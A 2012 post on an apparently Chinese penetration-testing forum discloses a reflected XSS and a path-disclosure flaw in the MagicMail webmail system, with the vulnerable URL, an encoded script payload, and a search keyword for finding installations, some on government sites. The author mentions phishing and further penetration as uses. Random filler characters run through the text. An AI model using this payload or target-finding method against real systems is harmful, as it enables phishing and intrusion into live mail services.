中国网络渗透测试联盟
标题:
MagicMail迈捷邮件系统XSS及绝对路径漏洞
[打印本页]
作者:
admin
时间:
2012-11-9 20:38
标题:
MagicMail迈捷邮件系统XSS及绝对路径漏洞
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
3 H: \% O) l; c" b" a* `8 m
' _: y6 j1 N6 l7 y2 D' Y6 s
& w2 r5 {2 y4 G
包含 一个反射性XSS 以及 绝对路径泄漏
- G! t b) P% B O2 K z9 Z% P
看了看 貌似全部是linux的。
& O& d1 `* L7 J2 o5 `
* |: q6 Q4 N& e: a+ q
关键字:迈捷邮件系统 by MagicMail
+ K7 f# ~/ y+ Y
4 p( G/ c* }+ B' Z6 r/ V
可以看到很多政府网站都用这个邮件系统
6 f2 n {" l0 o. J. W( E
" v" v, z3 L7 ^" G
绝对路径
http://madman.in/index.php?login_type=declare&language=
& |5 F' \2 |) L, d8 n- N
/ e/ f \* R0 U: ?& i1 V
8 W4 g2 _; j* v% j
5 S0 H9 p' c8 f8 I, F: O( i
XSS:
http://madman.in/index.php?login_type=declare&language=
–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
7 w+ x6 G0 G+ J- [/ \# `
6 q* u6 D! N4 `$ K& P: E. D8 a8 L
- F6 q2 Q5 q) ~
& T5 K7 {( W, P0 i, a. G
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
1 [/ C2 A( [! X. A0 b. h" O; D) _
7 v* s$ s& V- Y( e; V# P& S
修复方案:看官方补丁吧。
y' `8 `: R$ u6 l! Z0 ^2 V6 B
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2